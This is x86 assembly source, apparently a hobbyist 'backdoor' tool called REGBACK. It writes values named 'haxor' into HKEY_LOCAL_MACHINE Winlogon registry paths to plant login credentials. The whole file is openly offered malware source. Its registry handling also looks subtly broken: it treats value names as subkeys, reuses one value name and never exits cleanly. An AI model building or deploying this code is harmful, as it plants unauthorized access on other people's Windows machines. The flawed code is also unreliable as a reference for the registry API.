;tasm32 -ml regback.asm
;tasm32 -Tpe -x -c regback.obj ,,, import32
;write by asmbeginer.com      
;www.asmbeginer.com/backdoor/

.386p
locals
jumps
.model flat, stdcall

extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA : Proc
extrn RegCloseKey : Proc

.data

logo  db "--------------------  R.E.G.B.A.C.K 
---------------------------------", 13, 10
      db "Write by: ASMBEGINER.COM, why? just for fun and because i have
no job ", 13, 10
      db
"----------------------------------------------------------------------",
13, 10, 0
logolen equ $-logo


account   db "Account ok !",13,13
accountlen equ $-account


console_in      dd      ?
console_out     dd      ?
bytes_read      dd      ?


hKey            dd 80000002h    
lpSubKey        db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName', 0
lpSubKey2       db
'\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword', 0

cbData          dd 05h
lpData          db '01010101',0
lpValueName     db 'haxor', 0       ; login
lpValueName2    db 'haxor', 0       ; password
phkResult       dd 0
lpdwDisposition dd 0
.code

start:

        call    init_console
        push    logolen
        push    offset logo
        call    write_console

        call    init_console
        push    accountlen
        push    offset account
        call    write_console

; write login
      push offset lpdwDisposition
      push offset phkResult
      push 0
      push 1F0000h + 1 + 2h
      push 0
      push 0
      push 0
      push offset lpSubKey
      push hKey
      call RegCreateKeyExA

      push cbData
      push offset lpData
      push 01h
      push 0
      push offset lpValueName
      push phkResult
      call RegSetValueExA
  

; write password
      push offset lpdwDisposition
      push offset phkResult
      push 0
      push 1F0000h + 1 + 2h
      push 0
      push 0
      push 0
      push offset lpSubKey2
      push hKey
      call RegCreateKeyExA


      push cbData
      push offset lpData
      push 01h
      push 0
      push offset lpValueName2
      push phkResult
      call RegSetValueExA
      
      push 0
      call RegCloseKey
endp


init_console  proc
        push    -10
        call    GetStdHandle
        or      eax, eax
        je      init_error
        mov     [console_in], eax
        push    -11
        call    GetStdHandle
        or      eax, eax
        je      init_error
        mov     [console_out], eax
        ret
init_error:
        push    0
        call    ExitProcess
endp

write_console proc    text_out:dword, text_len:dword
        pusha
        push    0
        push    offset bytes_read 
        push    text_len          
        push    text_out          
        push    console_out       
        call    WriteConsoleA
        popa
        ret
endp

end     start